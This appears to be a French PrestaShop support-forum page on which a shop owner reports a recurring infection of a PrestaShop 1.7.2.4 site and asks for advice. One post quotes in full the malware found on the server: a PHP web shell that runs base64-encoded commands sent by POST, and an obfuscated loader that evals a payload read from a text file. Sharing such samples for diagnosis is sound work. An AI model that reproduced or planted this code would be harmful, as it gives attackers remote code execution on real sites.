Navigation

    aide prestashop

    PrestaHelp

    • S'inscrire
    • Se connecter
    • Recherche
    • Catégories
    • Récent
    • Mots-clés
    • Populaire
    • Utilisateurs
    • Groupes
    • Recherche
    1. Accueil
    2. RPro
    3. Messages
    R
    • Profil
    • Abonnements
    • Abonnés
    • Sujets
    • Messages
    • Meilleur sujets
    • Groupes

    Messages postés par RPro

    • RE: Nouvelle attaque ?

      J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...
      Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...

      posté dans Discussion générale
      R
      RPro
    • RE: Nouvelle attaque ?

      Le fichier 1.mcm.x86_64 est trop long pour être transmis tel quel.
      Le fichier confcom.php est vide
      Le fichier conf.php est le suivant :
      <!DOCTYPE html>
      <html>
      <head>
      <title>PHP command</title>
      </head>
      <body>
      <form method="post" action="">
      <input type="text" name="php" id="php">
      <input type="submit" value="Execute">
      </form>
      <?php
      if ($_SERVER['REQUEST_METHOD'] === 'POST') {
      $php = $_POST['php'];
      $php = strtr($php, '-', '=');
      $php = base64_decode($php);
      if($php) {
      $result = eval($php);
      echo $result;
      }
      }
      ?>
      </body>
      </html>

      Le fichier lowpr.php est le suivant :
      <?php
      $table_prefix = "wbzaxsye6w4_duevcwondme";
      $table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);
      $txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";
      $txt_contents = preg_replace("/\d+/", "", $txt_contents);
      $wp_content = $txt_contents("lowpr".".txt");
      eval/Designed with utility, safety and style/($table_prefix($wp_content));
      ?>

      J'espère que cela vous donnera des idées car je suis pas compétent !
      Merci par avance

      posté dans Discussion générale
      R
      RPro
    • RE: Nouvelle attaque ?

      Non !
      Il y a bien des alertes de modification mais après vérification, c'est normal.
      Aucune modification en rouge.

      posté dans Discussion générale
      R
      RPro
    • RE: Nouvelle attaque ?

      Désolé pour l'oubli : il s'agit de 1.7.2.4

      posté dans Discussion générale
      R
      RPro
    • Nouvelle attaque ?

      Bonjour à tous,

      Je constate sur mon presta certaines modifications anormales, en tout cas non souhaitées qui me laisse penser à une attaque.
      Voici en quelques mots ce que j'ai pu observer :
      Modification du htaccess
      Creation de fichiers 1.mcm.x86_64, confcom.php, conf.php, lowpr.php,...
      Malgré la suppression des fichiers indésirables et le rétablissement du htaccess, cela revient régulièrement.
      J'ai passé le scan de sécurité cleaner.php de @eolia qui ne détecte pas de virus.
      Quelqu'un a-t-il été confronté à cela auparavant ? Et si oui, quelles sont les actions à mener ?

      Merci pour vos réponses.

      posté dans Discussion générale
      R
      RPro